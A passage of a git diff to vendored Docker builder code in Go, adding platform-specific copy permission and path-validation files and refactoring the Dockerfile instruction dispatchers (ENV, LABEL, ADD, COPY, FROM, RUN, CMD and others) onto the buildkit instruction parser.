+			disposition: "attachment; filename=\"/xyz/uvw\"",
+			expected:    "uvw",
+		},
+		{
+			disposition: "attachment; filename=\"Naïve file.txt\"",
+			expected:    "Naïve file.txt",
+		},
+	}
+	for _, testcase := range testcases {
+		resp := http.Response{
+			Header: make(map[string][]string),
+		}
+		if testcase.disposition != "" {
+			resp.Header.Add("Content-Disposition", testcase.disposition)
+		}
+		filename := getFilenameForDownload(testcase.path, &resp)
+		assert.Check(t, is.Equal(testcase.expected, filename))
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go
new file mode 100644
index 0000000000..15453452e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go
@@ -0,0 +1,48 @@
+// +build !windows
+
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
+)
+
+func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error {
+	var (
+		skipChownRoot bool
+		err           error
+	)
+	if !overrideSkip {
+		destEndpoint := &copyEndpoint{driver: containerfs.NewLocalDriver(), path: destination}
+		skipChownRoot, err = isExistingDirectory(destEndpoint)
+		if err != nil {
+			return err
+		}
+	}
+
+	// We Walk on the source rather than on the destination because we don't
+	// want to change permissions on things we haven't created or modified.
+	return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error {
+		// Do not alter the walk root iff. it existed before, as it doesn't fall under
+		// the domain of "things we should chown".
+		if skipChownRoot && source == fullpath {
+			return nil
+		}
+
+		// Path is prefixed by source: substitute with destination instead.
+		cleaned, err := filepath.Rel(source, fullpath)
+		if err != nil {
+			return err
+		}
+
+		fullpath = filepath.Join(destination, cleaned)
+		return os.Lchown(fullpath, rootIDs.UID, rootIDs.GID)
+	})
+}
+
+func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go
new file mode 100644
index 0000000000..907c34407c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go
@@ -0,0 +1,43 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"errors"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/idtools"
+)
+
+var pathBlacklist = map[string]bool{
+	"c:\\":        true,
+	"c:\\windows": true,
+}
+
+func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error {
+	// chown is not supported on Windows
+	return nil
+}
+
+func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error {
+	// validate windows paths from other images + LCOW
+	if imageSource == nil || platform != "windows" {
+		return nil
+	}
+
+	origPath = filepath.FromSlash(origPath)
+	p := strings.ToLower(filepath.Clean(origPath))
+	if !filepath.IsAbs(p) {
+		if filepath.VolumeName(p) != "" {
+			if p[len(p)-2:] == ":." { // case where clean returns weird c:. paths
+				p = p[:len(p)-1]
+			}
+			p += "\\"
+		} else {
+			p = filepath.Join("c:\\", p)
+		}
+	}
+	if _, blacklisted := pathBlacklist[p]; blacklisted {
+		return errors.New("copy from c:\\ or c:\\windows is not allowed on windows")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
index 3e78abdd68..4d47c208b7 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go
@@ -1,4 +1,4 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 // This file contains the dispatchers for each command. Note that
 // `nullDispatch` is not actually a command, but support for commands we parse
@@ -8,23 +8,26 @@ package dockerfile
 // package.
 
 import (
+	"bytes"
 	"fmt"
-	"regexp"
 	"runtime"
 	"sort"
-	"strconv"
 	"strings"
-	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api"
-	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/strslice"
 	"github.com/docker/docker/builder"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/jsonmessage"
 	"github.com/docker/docker/pkg/signal"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/go-connections/nat"
+	"github.com/moby/buildkit/frontend/dockerfile/instructions"
+	"github.com/moby/buildkit/frontend/dockerfile/parser"
+	"github.com/moby/buildkit/frontend/dockerfile/shell"
+	"github.com/pkg/errors"
 )
 
 // ENV foo bar
@@ -32,127 +35,54 @@ import (
 // Sets the environment variable foo to bar, also makes interpolation
 // in the dockerfile available from the next statement on via ${foo}.
 //
-func env(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) == 0 {
-		return errAtLeastOneArgument("ENV")
-	}
-
-	if len(args)%2 != 0 {
-		// should never get here, but just in case
-		return errTooManyArguments("ENV")
-	}
-
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	// TODO/FIXME/NOT USED
-	// Just here to show how to use the builder flags stuff within the
-	// context of a builder command. Will remove once we actually add
-	// a builder command to something!
-	/*
-		flBool1 := b.flags.AddBool("bool1", false)
-		flStr1 := b.flags.AddString("str1", "HI")
-
-		if err := b.flags.Parse(); err != nil {
-			return err
-		}
-
-		fmt.Printf("Bool1:%v\n", flBool1)
-		fmt.Printf("Str1:%v\n", flStr1)
-	*/
-
-	commitStr := "ENV"
-
-	for j := 0; j < len(args); j++ {
-		// name  ==> args[j]
-		// value ==> args[j+1]
-
-		if len(args[j]) == 0 {
-			return errBlankCommandNames("ENV")
-		}
-		newVar := args[j] + "=" + args[j+1] + ""
-		commitStr += " " + newVar
+func dispatchEnv(d dispatchRequest, c *instructions.EnvCommand) error {
+	runConfig := d.state.runConfig
+	commitMessage := bytes.NewBufferString("ENV")
+	for _, e := range c.Env {
+		name := e.Key
+		newVar := e.String()
 
+		commitMessage.WriteString(" " + newVar)
 		gotOne := false
-		for i, envVar := range b.runConfig.Env {
+		for i, envVar := range runConfig.Env {
 			envParts := strings.SplitN(envVar, "=", 2)
 			compareFrom := envParts[0]
-			compareTo := args[j]
-			if runtime.GOOS == "windows" {
-				// Case insensitive environment variables on Windows
-				compareFrom = strings.ToUpper(compareFrom)
-				compareTo = strings.ToUpper(compareTo)
-			}
-			if compareFrom == compareTo {
-				b.runConfig.Env[i] = newVar
+			if shell.EqualEnvKeys(compareFrom, name) {
+				runConfig.Env[i] = newVar
 				gotOne = true
 				break
 			}
 		}
 		if !gotOne {
-			b.runConfig.Env = append(b.runConfig.Env, newVar)
+			runConfig.Env = append(runConfig.Env, newVar)
 		}
-		j++
 	}
-
-	return b.commit("", b.runConfig.Cmd, commitStr)
+	return d.builder.commit(d.state, commitMessage.String())
 }
 
 // MAINTAINER some text <maybe@an.email.address>
 //
 // Sets the maintainer metadata.
-func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("MAINTAINER")
-	}
+func dispatchMaintainer(d dispatchRequest, c *instructions.MaintainerCommand) error {
 
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	b.maintainer = args[0]
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer))
+	d.state.maintainer = c.Maintainer
+	return d.builder.commit(d.state, "MAINTAINER "+c.Maintainer)
 }
 
 // LABEL some json data describing the image
 //
 // Sets the Label variable foo to bar,
 //
-func label(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) == 0 {
-		return errAtLeastOneArgument("LABEL")
-	}
-	if len(args)%2 != 0 {
-		// should never get here, but just in case
-		return errTooManyArguments("LABEL")
+func dispatchLabel(d dispatchRequest, c *instructions.LabelCommand) error {
+	if d.state.runConfig.Labels == nil {
+		d.state.runConfig.Labels = make(map[string]string)
 	}
-
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
 	commitStr := "LABEL"
-
-	if b.runConfig.Labels == nil {
-		b.runConfig.Labels = map[string]string{}
+	for _, v := range c.Labels {
+		d.state.runConfig.Labels[v.Key] = v.Value
+		commitStr += " " + v.String()
 	}
-
-	for j := 0; j < len(args); j++ {
-		// name  ==> args[j]
-		// value ==> args[j+1]
-
-		if len(args[j]) == 0 {
-			return errBlankCommandNames("LABEL")
-		}
-
-		newVar := args[j] + "=" + args[j+1] + ""
-		commitStr += " " + newVar
-
-		b.runConfig.Labels[args[j]] = args[j+1]
-		j++
-	}
-	return b.commit("", b.runConfig.Cmd, commitStr)
+	return d.builder.commit(d.state, commitStr)
 }
 
 // ADD foo /path
@@ -160,128 +90,204 @@ func label(b *Builder, args []string, attributes map[string]bool, original strin
 // Add the file 'foo' to '/path'. Tarball and Remote URL (git, http) handling
 // exist here. If you do not wish to have this automatic handling, use COPY.
 //
-func add(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) < 2 {
-		return errAtLeastTwoArguments("ADD")
-	}
+func dispatchAdd(d dispatchRequest, c *instructions.AddCommand) error {
+	downloader := newRemoteSourceDownloader(d.builder.Output, d.builder.Stdout)
+	copier := copierFromDispatchRequest(d, downloader, nil)
+	defer copier.Cleanup()
 
-	if err := b.flags.Parse(); err != nil {
+	copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "ADD")
+	if err != nil {
 		return err
 	}
+	copyInstruction.chownStr = c.Chown
+	copyInstruction.allowLocalDecompression = true
 
-	return b.runContextCommand(args, true, true, "ADD")
+	return d.builder.performCopy(d.state, copyInstruction)
 }
 
 // COPY foo /path
 //
 // Same as 'ADD' but without the tar and remote url handling.
 //
-func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) < 2 {
-		return errAtLeastTwoArguments("COPY")
+func dispatchCopy(d dispatchRequest, c *instructions.CopyCommand) error {
+	var im *imageMount
+	var err error
+	if c.From != "" {
+		im, err = d.getImageMount(c.From)
+		if err != nil {
+			return errors.Wrapf(err, "invalid from flag value %s", c.From)
+		}
 	}
-
-	if err := b.flags.Parse(); err != nil {
+	copier := copierFromDispatchRequest(d, errOnSourceDownload, im)
+	defer copier.Cleanup()
+	copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "COPY")
+	if err != nil {
 		return err
 	}
+	copyInstruction.chownStr = c.Chown
 
-	return b.runContextCommand(args, false, false, "COPY")
+	return d.builder.performCopy(d.state, copyInstruction)
 }
 
-// FROM imagename
-//
-// This sets the image the dockerfile will build on top of.
-//
-func from(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("FROM")
+func (d *dispatchRequest) getImageMount(imageRefOrID string) (*imageMount, error) {
+	if imageRefOrID == "" {
+		// TODO: this could return the source in the default case as well?
+		return nil, nil
 	}
 
-	if err := b.flags.Parse(); err != nil {
-		return err
+	var localOnly bool
+	stage, err := d.stages.get(imageRefOrID)
+	if err != nil {
+		return nil, err
 	}
+	if stage != nil {
+		imageRefOrID = stage.Image
+		localOnly = true
+	}
+	return d.builder.imageSources.Get(imageRefOrID, localOnly, d.state.operatingSystem)
+}
 
-	name := args[0]
-
-	var (
-		image builder.Image
-		err   error
-	)
+// FROM [--platform=platform] imagename[:tag | @digest] [AS build-stage-name]
+//
+func initializeStage(d dispatchRequest, cmd *instructions.Stage) error {
+	d.builder.imageProber.Reset()
+	if err := system.ValidatePlatform(&cmd.Platform); err != nil {
+		return err
+	}
+	image, err := d.getFromImage(d.shlex, cmd.BaseName, cmd.Platform.OS)
+	if err != nil {
+		return err
+	}
+	state := d.state
+	if err := state.beginStage(cmd.Name, image); err != nil {
+		return err
+	}
+	if len(state.runConfig.OnBuild) > 0 {
+		triggers := state.runConfig.OnBuild
+		state.runConfig.OnBuild = nil
+		return dispatchTriggeredOnBuild(d, triggers)
+	}
+	return nil
+}
 
-	// Windows cannot support a container with no base image.
-	if name == api.NoBaseImageSpecifier {
-		if runtime.GOOS == "windows" {
-			return fmt.Errorf("Windows does not support FROM scratch")
+func dispatchTriggeredOnBuild(d dispatchRequest, triggers []string) error {
+	fmt.Fprintf(d.builder.Stdout, "# Executing %d build trigger", len(triggers))
+	if len(triggers) > 1 {
+		fmt.Fprint(d.builder.Stdout, "s")
+	}
+	fmt.Fprintln(d.builder.Stdout)
+	for _, trigger := range triggers {
+		d.state.updateRunConfig()
+		ast, err := parser.Parse(strings.NewReader(trigger))
+		if err != nil {
+			return err
 		}
-		b.image = ""
-		b.noBaseImage = true
-	} else {
-		// TODO: don't use `name`, instead resolve it to a digest
-		if !b.options.PullParent {
-			image, err = b.docker.GetImageOnBuild(name)
-			// TODO: shouldn't we error out if error is different from "not found" ?
+		if len(ast.AST.Children) != 1 {
+			return errors.New("onbuild trigger should be a single expression")
 		}
-		if image == nil {
-			image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output)
-			if err != nil {
-				return err
+		cmd, err := instructions.ParseCommand(ast.AST.Children[0])
+		if err != nil {
+			if instructions.IsUnknownInstruction(err) {
+				buildsFailed.WithValues(metricsUnknownInstructionError).Inc()
 			}
+			return err
 		}
+		err = dispatch(d, cmd)
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func (d *dispatchRequest) getExpandedImageName(shlex *shell.Lex, name string) (string, error) {
+	substitutionArgs := []string{}
+	for key, value := range d.state.buildArgs.GetAllMeta() {
+		substitutionArgs = append(substitutionArgs, key+"="+value)
 	}
-	b.from = image
 
-	return b.processImageFrom(image)
+	name, err := shlex.ProcessWord(name, substitutionArgs)
+	if err != nil {
+		return "", err
+	}
+	return name, nil
 }
 
-// ONBUILD RUN echo yo
-//
-// ONBUILD triggers run when the image is used in a FROM statement.
-//
-// ONBUILD handling has a lot of special-case functionality, the heading in
-// evaluator.go and comments around dispatch() in the same file explain the
-// special cases. search for 'OnBuild' in internals.go for additional special
-// cases.
-//
-func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) == 0 {
-		return errAtLeastOneArgument("ONBUILD")
+// getOsFromFlagsAndStage calculates the operating system if we need to pull an image.
+// stagePlatform contains the value supplied by optional `--platform=` on
+// a current FROM statement. b.builder.options.Platform contains the operating
+// system part of the optional flag passed in the API call (or CLI flag
+// through `docker build --platform=...`). Precedence is for an explicit
+// platform indication in the FROM statement.
+func (d *dispatchRequest) getOsFromFlagsAndStage(stageOS string) string {
+	switch {
+	case stageOS != "":
+		return stageOS
+	case d.builder.options.Platform != "":
+		// Note this is API "platform", but by this point, as the daemon is not
+		// multi-arch aware yet, it is guaranteed to only hold the OS part here.
+		return d.builder.options.Platform
+	default:
+		return runtime.GOOS
 	}
+}
 
-	if err := b.flags.Parse(); err != nil {
-		return err
+func (d *dispatchRequest) getImageOrStage(name string, stageOS string) (builder.Image, error) {
+	var localOnly bool
+	if im, ok := d.stages.getByName(name); ok {
+		name = im.Image
+		localOnly = true
 	}
 
-	triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0]))
-	switch triggerInstruction {
-	case "ONBUILD":
-		return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed")
-	case "MAINTAINER", "FROM":
-		return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction)
+	os := d.getOsFromFlagsAndStage(stageOS)
+
+	// Windows cannot support a container with no base image unless it is LCOW.
+	if name == api.NoBaseImageSpecifier {
+		imageImage := &image.Image{}
+		imageImage.OS = runtime.GOOS
+		if runtime.GOOS == "windows" {
+			switch os {
+			case "windows", "":
+				return nil, errors.New("Windows does not support FROM scratch")
+			case "linux":
+				if !system.LCOWSupported() {
+					return nil, errors.New("Linux containers are not supported on this system")
+				}
+				imageImage.OS = "linux"
+			default:
+				return nil, errors.Errorf("operating system %q is not supported", os)
+			}
+		}
+		return builder.Image(imageImage), nil
 	}
+	imageMount, err := d.builder.imageSources.Get(name, localOnly, os)
+	if err != nil {
+		return nil, err
+	}
+	return imageMount.Image(), nil
+}
+func (d *dispatchRequest) getFromImage(shlex *shell.Lex, name string, stageOS string) (builder.Image, error) {
+	name, err := d.getExpandedImageName(shlex, name)
+	if err != nil {
+		return nil, err
+	}
+	return d.getImageOrStage(name, stageOS)
+}
 
-	original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "")
+func dispatchOnbuild(d dispatchRequest, c *instructions.OnbuildCommand) error {
 
-	b.runConfig.OnBuild = append(b.runConfig.OnBuild, original)
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original))
+	d.state.runConfig.OnBuild = append(d.state.runConfig.OnBuild, c.Expression)
+	return d.builder.commit(d.state, "ONBUILD "+c.Expression)
 }
 
 // WORKDIR /tmp
 //
 // Set the working directory for future RUN/CMD/etc statements.
 //
-func workdir(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("WORKDIR")
-	}
-
-	err := b.flags.Parse()
-	if err != nil {
-		return err
-	}
-
-	// This is from the Dockerfile and will not necessarily be in platform
-	// specific semantics, hence ensure it is converted.
-	b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0])
+func dispatchWorkdir(d dispatchRequest, c *instructions.WorkdirCommand) error {
+	runConfig := d.state.runConfig
+	var err error
+	runConfig.WorkingDir, err = normalizeWorkdir(d.state.operatingSystem, runConfig.WorkingDir, c.Path)
 	if err != nil {
 		return err
 	}
@@ -290,35 +296,33 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str
 	// This avoids having an unnecessary expensive mount/unmount calls
 	// (on Windows in particular) during each container create.
 	// Prior to 1.13, the mkdir was deferred and not executed at this step.
-	if b.disableCommit {
+	if d.builder.disableCommit {
 		// Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo".
 		// We've already updated the runConfig and that's enough.
 		return nil
 	}
-	b.runConfig.Image = b.image
 
-	cmd := b.runConfig.Cmd
-	comment := "WORKDIR " + b.runConfig.WorkingDir
-	// reset the command for cache detection
-	b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment))
-	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
+	comment := "WORKDIR " + runConfig.WorkingDir
+	runConfigWithCommentCmd := copyRunConfig(runConfig, withCmdCommentString(comment, d.state.operatingSystem))
 
-	if hit, err := b.probeCache(); err != nil {
+	containerID, err := d.builder.probeAndCreate(d.state, runConfigWithCommentCmd)
+	if err != nil || containerID == "" {
 		return err
-	} else if hit {
-		return nil
 	}
 
-	container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig})
-	if err != nil {
-		return err
-	}
-	b.tmpContainers[container.ID] = struct{}{}
-	if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil {
+	if err := d.builder.docker.ContainerCreateWorkdir(containerID); err != nil {
 		return err
 	}
 
-	return b.commit(container.ID, cmd, comment)
+	return d.builder.commitContainer(d.state, containerID, runConfigWithCommentCmd)
+}
+
+func resolveCmdLine(cmd instructions.ShellDependantCmdLine, runConfig *container.Config, os string) []string {
+	result := cmd.CmdLine
+	if cmd.PrependShell && result != nil {
+		result = append(getShell(runConfig, os), result...)
+	}
+	return result
 }
 
 // RUN some command yo
@@ -327,117 +331,86 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str
 // the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under
 // Windows, in the event there is only one argument The difference in processing:
 //
-// RUN echo hi          # sh -c echo hi       (Linux)
+// RUN echo hi          # sh -c echo hi       (Linux and LCOW)
 // RUN echo hi          # cmd /S /C echo hi   (Windows)
 // RUN [ "echo", "hi" ] # echo hi
 //
-func run(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if b.image == "" && !b.noBaseImage {
-		return fmt.Errorf("Please provide a source image with `from` prior to run")
-	}
-
-	if err := b.flags.Parse(); err != nil {
-		return err
+func dispatchRun(d dispatchRequest, c *instructions.RunCommand) error {
+	if !system.IsOSSupported(d.state.operatingSystem) {
+		return system.ErrNotSupportedOperatingSystem
 	}
+	stateRunConfig := d.state.runConfig
+	cmdFromArgs := resolveCmdLine(c.ShellDependantCmdLine, stateRunConfig, d.state.operatingSystem)
+	buildArgs := d.state.buildArgs.FilterAllowed(stateRunConfig.Env)
 
-	args = handleJSONArgs(args, attributes)
-
-	if !attributes["json"] {
-		args = append(getShell(b.runConfig), args...)
-	}
-	config := &container.Config{
-		Cmd:   strslice.StrSlice(args),
-		Image: b.image,
-	}
-
-	// stash the cmd
-	cmd := b.runConfig.Cmd
-	if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 {
-		b.runConfig.Cmd = config.Cmd
-	}
-
-	// stash the config environment
-	env := b.runConfig.Env
-
-	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
-	defer func(env []string) { b.runConfig.Env = env }(env)
-
-	// derive the net build-time environment for this run. We let config
-	// environment override the build time environment.
-	// This means that we take the b.buildArgs list of env vars and remove
-	// any of those variables that are defined as part of the container. In other
-	// words, anything in b.Config.Env. What's left is the list of build-time env
-	// vars that we need to add to each RUN command - note the list could be empty.
-	//
-	// We don't persist the build time environment with container's config
-	// environment, but just sort and prepend it to the command string at time
-	// of commit.
-	// This helps with tracing back the image's actual environment at the time
-	// of RUN, without leaking it to the final image. It also aids cache
-	// lookup for same image built with same build time environment.
-	cmdBuildEnv := []string{}
-	configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env)
-	for key, val := range b.options.BuildArgs {
-		if !b.isBuildArgAllowed(key) {
-			// skip build-args that are not in allowed list, meaning they have
-			// not been defined by an "ARG" Dockerfile command yet.
-			// This is an error condition but only if there is no "ARG" in the entire
-			// Dockerfile, so we'll generate any necessary errors after we parsed
-			// the entire file (see 'leftoverArgs' processing in evaluator.go )
-			continue
-		}
-		if _, ok := configEnv[key]; !ok && val != nil {
-			cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val))
-		}
+	saveCmd := cmdFromArgs
+	if len(buildArgs) > 0 {
+		saveCmd = prependEnvOnCmd(d.state.buildArgs, buildArgs, cmdFromArgs)
 	}
 
-	// derive the command to use for probeCache() and to commit in this container.
-	// Note that we only do this if there are any build-time env vars.  Also, we
-	// use the special argument "|#" at the start of the args array. This will
-	// avoid conflicts with any RUN command since commands can not
-	// start with | (vertical bar). The "#" (number of build envs) is there to
-	// help ensure proper cache matches. We don't want a RUN command
-	// that starts with "foo=abc" to be considered part of a build-time env var.
-	saveCmd := config.Cmd
-	if len(cmdBuildEnv) > 0 {
-		sort.Strings(cmdBuildEnv)
-		tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...)
-		saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...))
-	}
-
-	b.runConfig.Cmd = saveCmd
-	hit, err := b.probeCache()
-	if err != nil {
+	runConfigForCacheProbe := copyRunConfig(stateRunConfig,
+		withCmd(saveCmd),
+		withEntrypointOverride(saveCmd, nil))
+	if hit, err := d.builder.probeCache(d.state, runConfigForCacheProbe); err != nil || hit {
 		return err
 	}
-	if hit {
-		return nil
-	}
 
-	// set Cmd manually, this is special case only for Dockerfiles
-	b.runConfig.Cmd = config.Cmd
-	// set build-time environment for 'run'.
-	b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...)
-	// set config as already being escaped, this prevents double escaping on windows
-	b.runConfig.ArgsEscaped = true
+	runConfig := copyRunConfig(stateRunConfig,
+		withCmd(cmdFromArgs),
+		withEnv(append(stateRunConfig.Env, buildArgs...)),
+		withEntrypointOverride(saveCmd, strslice.StrSlice{""}))
 
-	logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd)
+	// set config as already being escaped, this prevents double escaping on windows
+	runConfig.ArgsEscaped = true
 
-	cID, err := b.create()
+	cID, err := d.builder.create(runConfig)
 	if err != nil {
 		return err
 	}
 
-	if err := b.run(cID); err != nil {
+	if err := d.builder.containerManager.Run(d.builder.clientCtx, cID, d.builder.Stdout, d.builder.Stderr); err != nil {
+		if err, ok := err.(*statusCodeError); ok {
+			// TODO: change error type, because jsonmessage.JSONError assumes HTTP
+			msg := fmt.Sprintf(
+				"The command '%s' returned a non-zero code: %d",
+				strings.Join(runConfig.Cmd, " "), err.StatusCode())
+			if err.Error() != "" {
+				msg = fmt.Sprintf("%s: %s", msg, err.Error())
+			}
+			return &jsonmessage.JSONError{
+				Message: msg,
+				Code:    err.StatusCode(),
+			}
+		}
 		return err
 	}
 
-	// revert to original config environment and set the command string to
-	// have the build-time env vars in it (if any) so that future cache look-ups
-	// properly match it.
-	b.runConfig.Env = env
-	b.runConfig.Cmd = saveCmd
-	return b.commit(cID, cmd, "run")
+	return d.builder.commitContainer(d.state, cID, runConfigForCacheProbe)
+}
+
+// Derive the command to use for probeCache() and to commit in this container.
+// Note that we only do this if there are any build-time env vars.  Also, we
+// use the special argument "|#" at the start of the args array. This will
+// avoid conflicts with any RUN command since commands can not
+// start with | (vertical bar). The "#" (number of build envs) is there to
+// help ensure proper cache matches. We don't want a RUN command
+// that starts with "foo=abc" to be considered part of a build-time env var.
+//
+// remove any unreferenced built-in args from the environment variables.
+// These args are transparent so resulting image should be the same regardless
+// of the value.
+func prependEnvOnCmd(buildArgs *BuildArgs, buildArgVars []string, cmd strslice.StrSlice) strslice.StrSlice {
+	var tmpBuildEnv []string
+	for _, env := range buildArgVars {
+		key := strings.SplitN(env, "=", 2)[0]
+		if buildArgs.IsReferencedOrNotBuiltin(key) {
+			tmpBuildEnv = append(tmpBuildEnv, env)
+		}
+	}
+
+	sort.Strings(tmpBuildEnv)
+	tmpEnv := append([]string{fmt.Sprintf("|%d", len(tmpBuildEnv))}, tmpBuildEnv...)
+	return strslice.StrSlice(append(tmpEnv, cmd...))
 }
 
 // CMD foo
@@ -445,131 +418,39 @@ func run(b *Builder, args []string, attributes map[string]bool, original string)
 // Set the default command to run in the container (which may be empty).
 // Argument handling is the same as RUN.
 //
-func cmd(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	cmdSlice := handleJSONArgs(args, attributes)
-
-	if !attributes["json"] {
-		cmdSlice = append(getShell(b.runConfig), cmdSlice...)
-	}
-
-	b.runConfig.Cmd = strslice.StrSlice(cmdSlice)
+func dispatchCmd(d dispatchRequest, c *instructions.CmdCommand) error {
+	runConfig := d.state.runConfig
+	cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem)
+	runConfig.Cmd = cmd
 	// set config as already being escaped, this prevents double escaping on windows
-	b.runConfig.ArgsEscaped = true
+	runConfig.ArgsEscaped = true
 
-	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil {
+	if err := d.builder.commit(d.state, fmt.Sprintf("CMD %q", cmd)); err != nil {
 		return err
 	}
 
-	if len(args) != 0 {
-		b.cmdSet = true
+	if len(c.ShellDependantCmdLine.CmdLine) != 0 {
+		d.state.cmdSet = true
 	}
 
 	return nil
 }
 
-// parseOptInterval(flag) is the duration of flag.Value, or 0 if
-// empty. An error is reported if the value is given and is not positive.
-func parseOptInterval(f *Flag) (time.Duration, error) {
-	s := f.Value
-	if s == "" {
-		return 0, nil
-	}
-	d, err := time.ParseDuration(s)
-	if err != nil {
-		return 0, err
-	}
-	if d <= 0 {
-		return 0, fmt.Errorf("Interval %#v must be positive", f.name)
-	}
-	return d, nil
-}
-
 // HEALTHCHECK foo
 //
 // Set the default healthcheck command to run in the container (which may be empty).
 // Argument handling is the same as RUN.
 //
-func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) == 0 {
-		return errAtLeastOneArgument("HEALTHCHECK")
-	}
-	typ := strings.ToUpper(args[0])
-	args = args[1:]
-	if typ == "NONE" {
-		if len(args) != 0 {
-			return fmt.Errorf("HEALTHCHECK NONE takes no arguments")
-		}
-		test := strslice.StrSlice{typ}
-		b.runConfig.Healthcheck = &container.HealthConfig{
-			Test: test,
-		}
-	} else {
-		if b.runConfig.Healthcheck != nil {
-			oldCmd := b.runConfig.Healthcheck.Test
-			if len(oldCmd) > 0 && oldCmd[0] != "NONE" {
-				fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd)
-			}
-		}
-
-		healthcheck := container.HealthConfig{}
-
-		flInterval := b.flags.AddString("interval", "")
-		flTimeout := b.flags.AddString("timeout", "")
-		flRetries := b.flags.AddString("retries", "")
-
-		if err := b.flags.Parse(); err != nil {
-			return err
-		}
-
-		switch typ {
-		case "CMD":
-			cmdSlice := handleJSONArgs(args, attributes)
-			if len(cmdSlice) == 0 {
-				return fmt.Errorf("Missing command after HEALTHCHECK CMD")
-			}
-
-			if !attributes["json"] {
-				typ = "CMD-SHELL"
-			}
-
-			healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...))
-		default:
-			return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ)
-		}
-
-		interval, err := parseOptInterval(flInterval)
-		if err != nil {
-			return err
+func dispatchHealthcheck(d dispatchRequest, c *instructions.HealthCheckCommand) error {
+	runConfig := d.state.runConfig
+	if runConfig.Healthcheck != nil {
+		oldCmd := runConfig.Healthcheck.Test
+		if len(oldCmd) > 0 && oldCmd[0] != "NONE" {
